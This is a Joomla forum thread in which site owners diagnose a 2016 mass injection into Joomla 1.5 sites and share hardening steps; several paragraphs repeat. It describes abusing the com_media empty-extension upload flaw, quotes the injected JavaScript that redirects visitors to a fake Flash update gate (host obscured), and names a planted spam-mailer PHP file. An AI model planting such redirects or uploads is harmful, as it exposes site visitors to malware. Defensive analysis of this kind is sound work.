I have been looking into this issue on behalf of the VEL since this morning. It seems that the actual script injected doesn't do anything dangerous, either because the attacker was not very competent, or maybe just wanted a proof of concept. That is just our good luck, we should definitely be very worried about this. From the number of sites affected it is obvious that this is an automated attack, and therefore it seems could easily be replicated, except with some real malware next time.
It seems that the attack involves adding a php file to mod stats. I have checked the module, I cannot find any obvious weakness in it, it is most likely that it is just a convenient place to try to hide a file and nothing to do with the module itself.
I think that by far the most likely way that this attack is accomplished is through the known vulnerability in com_media which was discovered back in 2013, which uses an empty file extension to bypass the normal file checks.
So how to protect against the attack?
The most preferred option is to update your site to the latest Joomla, 3.6.2, it is much more secure. However it is quite a complex migration path from 1.5 to 3.6, and inevitably takes time. It seems to me that there are some basic security hardening steps that you can take that should offer some protection against the com_media hack in the meantime.
1. Update your site to the latest version of 1.5, that is 1.5.26, unless someone has been hacking the core code that ought to be possible;
2. apply the file upload vulnerability patch, it is available here at the bottom of the page: http://joomlacode.org/gf/project/joomla ... m_id=31626
3. in the Joomla configuration, make sure that user registration is disabled; unfortunately by default in J1.5 anyone can create an active account on your site unless you disallow it; unless of course this is impossible, for example on an e-commerce store;
4. in the com_media options, make sure that the Restrict Uploads option is set to "YES"
5. also in the com_media options, set Check Mime Type to "NO", this may seem counterintuitive, but what this does is it restricts uploads of non-image files to administrators only
[/list]
To explain why I am suggesting these steps:-
The basic problem is weak ACL in com_media in Joomla 1.5, any registered user can access the file controller upload task, and anyone by default can register themselves as a user. Then whether a file can be uploaded only depends on the canUpload() test in com_media/helpers/media.php, it is that test the empty file extension vulnerability managed to exploit.
The Mime Check option matters because as a test it is very weak in fact completely useless as far as security is concerned: a PHP file would pass it, so it is much better to turn it off and instead restrict uploads to those with admin login privileges (managers, administrators and super users).
Still it is far better to migrate your site to Joomla 3, even if you manage to patch all the security issues in the Joomla Core you will still probably have extensions that contain vulnerabilities.
It seems that the attack involves adding a php file to mod stats. I have checked the module, I cannot find any obvious weakness in it, it is most likely that it is just a convenient place to try to hide a file and nothing to do with the module itself.
I think that by far the most likely way that this attack is accomplished is through the known vulnerability in com_media which was discovered back in 2013, which uses an empty file extension to bypass the normal file checks.
So how to protect against the attack?
The most preferred option is to update your site to the latest Joomla, 3.6.2, it is much more secure. However it is quite a complex migration path from 1.5 to 3.6, and inevitably takes time. It seems to me that there are some basic security hardening steps that you can take that should offer some protection against the com_media hack in the meantime.
1. Update your site to the latest version of 1.5, that is 1.5.26, unless someone has been hacking the core code that ought to be possible;
2. apply the file upload vulnerability patch, it is available here at the bottom of the page: http://joomlacode.org/gf/project/joomla ... m_id=31626
3. in the Joomla configuration, make sure that user registration is disabled; unfortunately by default in J1.5 anyone can create an active account on your site unless you disallow it; unless of course this is impossible, for example on an e-commerce store;
4. in the com_media options, make sure that the Restrict Uploads option is set to "YES"
5. also in the com_media options, set Check Mime Type to "NO", this may seem counterintuitive, but what this does is it restricts uploads of non-image files to administrators only
[/list]
To explain why I am suggesting these steps:-
The basic problem is weak ACL in com_media in Joomla 1.5, any registered user can access the file controller upload task, and anyone by default can register themselves as a user. Then whether a file can be uploaded only depends on the canUpload() test in com_media/helpers/media.php, it is that test the empty file extension vulnerability managed to exploit.
The Mime Check option matters because as a test it is very weak in fact completely useless as far as security is concerned: a PHP file would pass it, so it is much better to turn it off and instead restrict uploads to those with admin login privileges (managers, administrators and super users).
Still it is far better to migrate your site to Joomla 3, even if you manage to patch all the security issues in the Joomla Core you will still probably have extensions that contain vulnerabilities.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.
It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL,
If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript
That URL which I have obscured is a fake Adobe update site, it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware, if it is not working then that is just good luck on our part.
It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL,
If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript
Code: Select all
window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
-
- Joomla! Fledgling
- Posts: 1
- Joined: Fri Sep 02, 2016 8:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
Problem Description :: Forum Post Assistant (v1.2.7) : 2nd September 2016 wrote:Suddenly my website starts to send email for everyone of my clients and even the emploeeys.
Forum Post Assistant (v1.2.7) : 2nd September 2016 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Writable (755) | Owner: fosseway (uid: 1/gid: 1) | Group: fosseway (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: 0 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.32-504.12.2.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/fosseway/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.4.44 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 2M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.6.31 (Client:mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 49.00 MiB | #of Tables: 119Detailed Environment :: wrote:PHP Extensions :: Core (5.4.44) | date (5.4.44) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | hash (1.0) | iconv () | SPL (0.2) | json (1.2.1) | mbstring () | mcrypt () | session () | standard (5.4.44) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | mysqli (0.1) | Phar (2.0.1) | posix () | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | mysql (1.0) | SimpleXML (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: NoFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) ::Extensions Discovered :: wrote:Components :: SITE :: User (1.5.0) | MailTo (1.5.0) | default (1.0.0) | Wrapper (1.5.0) | Froogle (1.0.0) |
Components :: ADMIN :: Template Manager (1.5.0) | Weblinks (1.5.0) | Polls (1.5.0) | Language Manager (1.5.0) | Smart Former (2.4.0) | Control Panel (1.5.0) | VirtueMart (1.1.4) | sh404sef (2.0.1.531) | sh404sef - System mobile templ (1.0.0.531) | sh404sef - System plugin (2.0.1.531) | J16 Language backport - system (1.0.0.531) | sh404sef - Similar urls plugin (2.0.1.531) | Newsfeeds (1.5.0) | User Manager (1.5.0) | swMenuPro (6.5) | Banners (1.5.0) | Mass Mail (1.5.0) | Media Manager (1.5.0) | Cache Manager (1.5.0) | Instantsearch (1) | Content Page (1.5.0) | Search (1.5.0) | Messaging (1.5.0) | Module Manager (1.5.0) | Configuration Manager (1.5.0) | Plugin Manager (1.5.0) | JoomlaPack (2.1) | Froogle (1.0.0) | Frontpage (1.5.0) | Trash (1.0.0) | Installation Manager (1.5.0) | Contact Items (1.0.0) | Menus Manager (1.5.0) |
Modules :: SITE :: Poll (1.5.0) | VirtueMart Currency Selector (1.1.0) | Related Items (1.0.0) | Who\'s Online (1.0.0) | Custom HTML (1.5.0) | Random Image (1.5.0) | VirtueMart Search (1.1.0) | VirtueMart Random Products (1.1.0) | Sections (1.5.0) | VirtueMart Featured Products (1.1.0) | Archived Content (1.5.0) | Extended Menu (1.0.6 (build ) | SmartFormer (1.5.0) | swMenuPro (6.5) | Search (1.0.0) | Random Products (1.5.0) | VirtueMart Shopping Cart (1.1.0) | VirtueMart Login (1.1.4) | Statistics (1.5.0) | Latest News (1.5.0) | Menu (1.5.0) | VirtueMart Product Categories (1.1.0) | Wrapper (1.0.0) | VirtueMart Module (1.1.4) | VirtueMart Manufacturers (1.1.0) | VirtueMart Top Ten Products (1.1.0) | VirtueMart Latest Products (1.1.0) | Syndicate (1.5.0) | Footer (1.5.0) | Most Read Content (1.5.0) | Newsflash (1.5.0) | Feed Display (1.5.0) | Banner (1.5.0) | VirtueMart Product Scroller (1.1.0) | Breadcrumbs (1.5.0) | Login (1.5.0) |
Modules :: ADMIN :: Latest News (1.0.0) | Title (1.0.0) | Custom HTML (1.5.0) | Popular Items (1.0.0) | User Status (1.5.0) | Admin Submenu (1.0.0) | Logged in Users (1.0.0) | Items Stats (1.0.0) | Online Users (1.0.0) | Footer (1.0.0) | Unread Items (1.0.0) | Feed Display (1.5.0) | Admin Menu (1.0.0) | Toolbar (1.0.0) | Quick Icons (1.0.0) | Login Form (1.0.0) |
Plugins :: SITE :: Button - Image (1.0.0) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | Search - Content (1.5) | Search - Contacts (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Categories (1.5) | Search - Sections (1.5) | Virtuemart Extended Search Plu (1.5) | System - LazyDbBackup (1.5.4b) | System - SEF (1.5) | System - Cache (1.5) | System - Mootools Upgrade (1.5) | System - Log (1.5) | System - Backlinks (1.5) | System - Remember Me (1.5) | sh404sef - System mobile templ (1.0.0.531) | Azrul System Mambot For Joomla (2.7) | System - Google Analytics Trac (1.2.3) | sh404sef - System plugin (2.0.1.531) | System - Legacy (1.5) | System - Debug (1.5) | J16 Language backport - system (1.0.0.531) | User - Joomla! (1.5) | User - Example (1.0) | Editor - XStandard Lite for Jo (1.0) | Image Manager (1.5.2) | SpellChecker (2.0.0) | Object Support (1.5.1) | Paste (1.5.3) | File Browser (1.5.0 Stable) | Paste (1.5.0) | Advanced Code Editor (1.5.3) | Joomla! Links for Advanced Lin (1.2.1) | Advanced Link (1.5.1) | Editor - JCE 154 (154) | Editor - TinyMCE 3 (3.2.6) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | sh404sef - Similar urls plugin (2.0.1.531) | Authentication - Joomla (1.5) | Authentication - Example (1.5) | Authentication - OpenID (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | VirtueMart Product Snapshot (1.1.0) | Content - Example (1.0) | Content - Smart Former 2.4 (1.5) | Content - Vote (1.5) | Content - Pagebreak (1.5) | Content - Email Cloaking (1.5) | Azrul Videobot (0.1) | Content - Code Highlighter (Ge (1.5) | Content - Page Navigation (1.5) | Content - Load Modules (1.5) |Templates Discovered :: wrote:Templates :: SITE :: Fosseway (1.0) | Fosseway (1.0) | jTemplate (1.0.3) | beez (1.0.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 31, 2016 11:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
The same for me,rogeriovaz wrote:Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
The attacker was using a HTPP POST to /libraries/phpxmlrpc/compat/article48.php send spam mail.
also changed the modified date of article48.php so that it wasnt obvious.
Also got some spam email from this forum as soon as I registered.
While I work out what to do I im using a static rip of the joomla site .